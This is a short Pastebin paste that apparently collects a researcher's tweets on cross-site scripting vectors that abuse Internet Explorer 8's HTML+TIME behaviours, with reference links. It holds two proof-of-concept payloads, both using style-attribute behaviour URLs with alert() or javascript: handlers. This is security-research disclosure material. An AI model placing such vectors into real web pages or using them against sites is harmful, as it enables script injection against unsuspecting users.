Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 1. https://twitter.com/0x6D6172696F/status/7180793115:
- Ever heard about IE's HTML+TIME? http://is.gd/5G60U - enabling vectors like this: 1<x/style=`behavior:url(#default#time2)`onbegin=alert(2)>
- 2. https://twitter.com/0x6D6172696F/status/7196312532:
- More HTML+TIME - changing link targets: http://pastebin.com/f521ea4e6
- 3. https://twitter.com/0x6D6172696F/status/7196350903:
- XSS via style attribute - it's back :) <a style=behavior:url(#default#anchorclick) folder=javascript:alert(1) href=http://good.com>IE8</a>
- 4. https://twitter.com/0x6D6172696F/status/7197250108:
- Just to have this little rascal persisted - self-executing XSS with ALL HTML elements on IE8 http://pastebin.com/f3712ff6a
- More info on HTML+TIME:
- * http://msdn.microsoft.com/de-de/library/ms533099%28en-us,VS.85%29.aspx
- * http://msdn.microsoft.com/de-de/library/ms533102%28en-us,VS.85%29.aspx
- * http://www.w3.org/TR/NOTE-HTMLplusTIME
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement